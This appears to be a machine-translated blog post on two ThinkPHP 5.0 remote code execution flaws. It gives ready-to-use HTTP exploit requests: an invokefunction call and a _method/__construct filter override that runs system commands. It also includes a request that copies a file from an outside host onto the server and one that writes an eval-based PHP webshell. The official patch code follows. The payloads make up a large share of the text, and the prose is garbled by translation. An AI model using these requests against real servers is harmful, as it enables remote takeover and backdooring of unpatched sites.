ThinkPHP5.0 vulnerability testing
Since ThinkPHP release bug fixes, the server does not know how many times by the batch scanning vulnerability to grab broiler request
although the official has already released a patch, or want to try TP vulnerability, vulnerability testing two
First, the full version Execution Vulnerability
<!-- GET -->
http://127.0.0.1/ThinkPHP/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Because there is no clear detection of the controller name, in the absence of mandatory routes open, you can directly execute phpinfo (), if the server is not limiting shell functions such as execution, you can execute shell directly mention the right to
detailed process execution vulnerability can reference vulnerability execution
Official patch
Adding regular expressions to limit the controller name
/* /thinkphp/library/think/App.php 555行 加入 */
if (!preg_match('/^[A-Za-z](\w)*$/', $controller)) {
throw new HttpException(404, 'controller not exists:' . $controller);
}
Two, _method vulnerability
<!-- POST -->
http://127.0.0.1/ThinkPHP/index.php?s=captcha
<!-- Headers -->
Content-Type:application/x-www-form-urlencoded
<!-- Body -->
_method=__construct&filter[]=system&method=GET&get[]=dir
Triggering conditions
//Config.php
'var_method' => '_method'
Use $_POST['_method']to request transmission method real variables as $_POST['_method']=__constructtime, method Request class method will be overwritten by the class variables, using this method to cover the filter variable system functions such as name, when the internal filter parameters will be performed any command
based on this can be uploaded directly PHP file test.php
<!-- POST -->
http://127.0.0.1/ThinkPHP/index.php?s=captcha&fileDown=copy("http://xxx/1.txt","test.php")
<!-- Headers -->
Content-Type:application/x-www-form-urlencoded
<!-- Body -->
_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=fileDown
Generating a word Trojan
<!-- POST -->
http://127.0.0.1/ThinkPHP/index.php?s=captcha&T=echo+^<?php+phpinfo();eval($_POST[cmd]);?^>+>>info.php
<!-- Headers -->
Content-Type:application/x-www-form-urlencoded
<!-- Body -->
_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=123
_Method can be set to a different character in config.php, or upgrade TP
Official patch
The official patch limits the request method set _method suspicious, and after processing _method it unset, the variables can no longer be covered by the use of __construct
/* thinkphp/library/think/Request.php */
public function method($method = false)
{
if (true === $method) {
// 获取原始请求类型
return IS_CLI ? 'GET' : (isset($this->server['REQUEST_METHOD']) ? $this->server['REQUEST_METHOD'] : $_SERVER['REQUEST_METHOD']);
} elseif (!$this->method) {
if (isset($_POST[Config::get('var_method')])) {
$method = strtoupper($_POST[Config::get('var_method')]);
if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) {
$this->method = $method;
$this->{$this->method}($_POST);
} else {
$this->method = 'POST';
}
unset($_POST[Config::get('var_method')]); //unset
} elseif (isset($_SERVER['HTTP_X_HTTP_METHOD_OVERRIDE'])) {
$this->method = strtoupper($_SERVER['HTTP_X_HTTP_METHOD_OVERRIDE']);
} else {
$this->method = IS_CLI ? 'GET' : (isset($this->server['REQUEST_METHOD']) ? $this->server['REQUEST_METHOD'] : $_SERVER['REQUEST_METHOD']);
}
}
return $this->method;
}
Reference article:
https://www.cnblogs.com/st404/p/10245844.html
https://mrxn.net/Infiltration/618.html
https://www.cnblogs.com/nul1/p/11863574.html
https://www.vulnbug.com/amp/thkphp5x-code-execution-vulnerabilities-and-bypass.html
https://www.freebuf.com/vuls/194127.html